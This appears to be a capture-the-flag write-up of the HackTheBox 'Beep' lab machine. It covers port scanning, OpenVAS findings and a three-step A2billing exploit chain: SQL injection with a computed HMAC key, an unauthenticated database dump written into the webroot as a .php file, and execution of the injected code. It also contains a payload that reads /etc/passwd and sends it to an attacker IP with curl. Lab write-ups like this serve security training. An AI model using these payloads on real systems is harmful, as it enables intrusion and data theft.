Beep
Starting information
Machine IP : 10.10.10.7 System : Linux (CentOS, per the Apache banner and el5 package versions below)
Network enumeration
I start by adding an entry to my /etc/hosts file to avoid typing the IP every time:
10.10.10.7 beep
Then I look for open ports (full TCP range, no ping) and start an OpenVAS scan in parallel:
nmap -p- beep -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 19:14 CEST
Nmap scan report for beep (10.10.10.7)
Host is up (0.034s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
879/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
Now I can run nmap's version detection and default scripts (-A) on the open ports to gather more information. Note the typo in the port list of the command: 11 and 445 were typed instead of 111 and 4445, which is why those two show up as closed below and rpcbind (111) and 4445 were never fingerprinted:
nmap -p22,25,80,110,11,143,443,879,993,995,3306,4190,445,4559,5038,10000 -A -Pn beep
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 19:16 CEST
Nmap scan report for beep (10.10.10.7)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
11/tcp closed systat
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://beep/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP STLS RESP-CODES EXPIRE(NEVER) USER LOGIN-DELAY(0) TOP
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES LIST-SUBSCRIBED NAMESPACE MAILBOX-REFERRALS URLAUTHA0001 RENAME LITERAL+ LISTEXT IDLE UIDPLUS CONDSTORE RIGHTS=kxte IMAP4rev1 CATENATE STARTTLS ANNOTATEMORE CHILDREN ID Completed QUOTA THREAD=ORDEREDSUBJECT MULTIAPPEND SORT SORT=MODSEQ OK ATOMIC NO UNSELECT IMAP4 X-NETSCAPE BINARY ACL
443/tcp open ssl/https?
|_ssl-date: 2019-09-29T17:13:59+00:00; -2m53s from scanner time.
445/tcp closed microsoft-ds
879/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: -2m53s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.95 seconds
Information gathered
My OpenVAS scan is now finished; from nmap and OpenVAS, here is what I know:
Operating System
Linux, CentOS 5 (Apache/2.2.3 (CentOS) banner, Cyrus packages built for el5, OS: Unix in the nmap service info)
Open ports
Port | Service |
---|---|
22/tcp | ssh (OpenSSH 4.3) |
25/tcp | smtp (Postfix) |
80/tcp | http (Apache 2.2.3, redirects to https) |
110/tcp | pop3 (Cyrus 2.3.7) |
111/tcp | rpcbind |
143/tcp | imap (Cyrus 2.3.7) |
443/tcp | https (Elastix web interface) |
879/tcp | status (RPC #100024) |
993/tcp | imaps (Cyrus) |
995/tcp | pop3s (Cyrus) |
3306/tcp | mysql (unauthorized) |
4190/tcp | sieve (Cyrus timsieved) |
4445/tcp | upnotifyp |
4559/tcp | hylafax (HylaFAX 4.3.10) |
5038/tcp | asterisk (Asterisk Call Manager 1.1) |
10000/tcp | http (Webmin, MiniServ 1.570) |
Vulnerabilities
Multiple vulnerabilities were detected. Below are the ones with a high severity (rows without a CVE are reported by OpenVAS without one):
CVE | Service | Description |
---|---|---|
CVE-2013-3213 | 443/tcp | Vtiger CRM Multiple SQL Injection Vulnerabilities |
CVE-2002-0756 | 10000/tcp | Webmin / Usermin Login Cross Site Scripting Vulnerability |
(none) | 443/tcp | vtiger CRM 'graph.php' Script Authentication Bypass Vulnerability |
CVE-2012-4869, CVE-2012-4870 | 443/tcp | FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities |
CVE-2016-4834, CVE-2016-1713 | 443/tcp | VTiger CRM Privilege Escalation and Unrestricted File Upload Vulnerability |
CVE-2019-12840 | 10000/tcp | Webmin <= 1.910 Remote Code Execution (RCE) Vulnerability |
(none) | OS | OS End Of Life Detection Mitigation |
CVE-2014-7235 | 443/tcp | FreePBX 'index.php' Remote Command Execution Vulnerability |
(none) | 443/tcp | A2billing Backup File Download / Remote Code Execution Vulnerabilities |
Exploits
Fuzzing the Elastix login page at https://10.10.10.7/ did not work. Fuzzing the Webmin login page at https://10.10.10.7:10000/session_login.cgi gets us locked out after too many attempts:
Error - Access denied for 10.10.14.4. The host has been blocked because of too many authentication failures.
zaproxy is not very good here since the longest delay it can put between attempts is 1 second. (The Webmin RCE reported by OpenVAS, CVE-2019-12840, needs valid Webmin credentials, so without a working login it is of no use.)
hydra SSH brute force: no luck.
Testing PHP code
To test PHP code locally before using it against the target:
- Create a directory test.
- Create a file index.php in it with some PHP code inside.
- From inside that directory, run: sudo docker run --rm -v $(pwd):/app -w /app -p 8989:8989 php php -S 0.0.0.0:8989
- Navigate to http://localhost:8989
Some sample PHP code:
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>
Compute the payload
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Compute security key</title>
</head>
<body>
<?php
function securitykey($data)
{
    // RFC 2104 HMAC implementation for php.
    // Creates an md5 HMAC.
    // Eliminates the need to install mhash to compute a HMAC
    // Hacked by Lance Rushing
    $key = "asdf1212fasd121554sd4f5s45sdf";
    // The key is computed over the plain "union select ... -- -" form of the
    // injected transactionID; the request itself carries the filter-bypass
    // spelling (see the Payload line below).
    $data = bin2hex($data);
    $data = "9^456789111111 union select 1,2,3,4,0x706c75676e706179,0x".$data.",7,8,9,10,11,12,13-- -^3^2";
    $b = 64; // byte length for md5
    if (strlen($key) > $b) {
        $key = pack("H*", md5($key));
    }
    $key = str_pad($key, $b, chr(0x00));
    $ipad = str_pad('', $b, chr(0x36));
    $opad = str_pad('', $b, chr(0x5c));
    $k_ipad = $key ^ $ipad;
    $k_opad = $key ^ $opad;
    return md5($k_opad . pack("H*", md5($k_ipad . $data)));
}
// Full <?php tags instead of short <? tags so this also works where short_open_tag is off.
$payload = isset($_POST['payload']) ? $_POST['payload'] : '';
$sessid  = isset($_POST['sessid'])  ? $_POST['sessid']  : '';
?>
<?php if ($payload != '') { ?>
<h1>Security Key</h1>
<p>Key = <?php echo securitykey($payload); ?></p>
<p>Payload = </p>
<p> <?php echo "transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x".bin2hex($payload).",7,8,9,10,11,12,13-//**- -&sess_id=".$sessid."&key=".securitykey($payload); ?></p>
<a href="index.php">Compute transaction ID</a>
<?php } else { ?>
<form action="index.php" method="post">
<label for="payload">PHP Payload</label>
<input type="text" name="payload">
<label for="sessid">Session ID</label>
<input type="text" name="sessid">
<input type="submit" name="compute" value="Compute Security Key">
</form>
<?php } ?>
</body>
</html>
Encoding a PHP payload for later use (encode64 in the original is a local helper; the standard base64 tool gives the same output, shown on the next line):
printf '%s' 'system('\''x=$(cat /etc/passwd);curl -d ${x} http://10.10.14.10:8000/0x4148.jnk'\'');' | base64 | tr -d '\n'
c3lzdGVtKCd4PSQoY2F0IC9ldGMvcGFzc3dkKTtjdXJsIC1kICR7eH0gaHR0cDovLzEwLjEwLjE0LjEwOjgwMDAvMHg0MTQ4LmpuaycpOw==
Triggering the backup dump into 0x7777.php and fetching it (same technique as Step 2 below):
wget 'https://10.10.10.7/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x7777.php' --no-check-certificate
wget 'https://10.10.10.7/a2billing/admin/Public/0x7777.php' --no-check-certificate
Three steps to the exploit.
Step 1 : SQL Injection
We exploit a flaw in checkout_process.php to get some PHP code stored in the database. Here is the faulty code:
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, creationdate, status, cvv, credit_card_type, currency " .
         " FROM cc_epayment_log_agent " .
         " WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND $NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
As we can see, $transactionID is concatenated straight into the query, so it is injectable. There are a few more quirks to the injection: some keyword filters have to be bypassed (hence the unise//**lecton selinse//**rtect and -//**- - spelling in the request below) and the key parameter has to be computed over the injected string; more details can be found on 0x4148's blog.
Here we inject <?php echo magnolia3738 ?>, which is 3c3f706870206563686f206d61676e6f6c696133373338203f3e in hex. The marker is deliberately a bare word rather than a quoted string: mysqldump backslash-escapes quotes in the INSERT statements it writes, and PHP 5 echoes an undefined constant as its own name, so unquoted code survives the dump used in Step 2. The command below carries the quoted variant (0x3c3f...223b203f3e is <?php echo "magnolia3738"; ?>) together with the key computed for it; whichever variant is sent, the key must be computed over that exact string:
wget --post-data "transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206563686f20226d61676e6f6c696133373338223b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=1234&key=808448f76bfc13cef5c64521edf7f45d" https://10.10.10.7/a2billing/agent/Public/checkout_process.php --no-check-certificate
Step 2 : Backup Dump
Another vulnerability lets us dump the database to a file of our choosing, without being authenticated. The faulty code is in FG_var_backup.inc. This line runs the backup:
$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'";
But, as we can see earlier in the same file, $backup_file is taken straight from the user-supplied $path parameter, with no check on the name or the directory it points to ($backup_file also lands inside a shell command, so the same parameter is a command-injection sink, but controlling the path is enough here):
if ($form_action == 'add'){
    $backup_file = $path;
Since A2B_entity_backup.php includes FG_var_backup.inc, a single request (a GET is enough, no POST needed) triggers the database dump and chooses the filename:
wget 'https://10.10.10.7/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=mycode.php' --no-check-certificate
Once this link has been visited, the dump is served from https://10.10.10.7/a2billing/admin/Public/mycode.php. Because the dump contains the PHP code injected into the database in Step 1, and the file sits in the webroot with a .php extension, fetching it executes our code:
wget 'https://10.10.10.7/a2billing/admin/Public/mycode.php' --no-check-certificate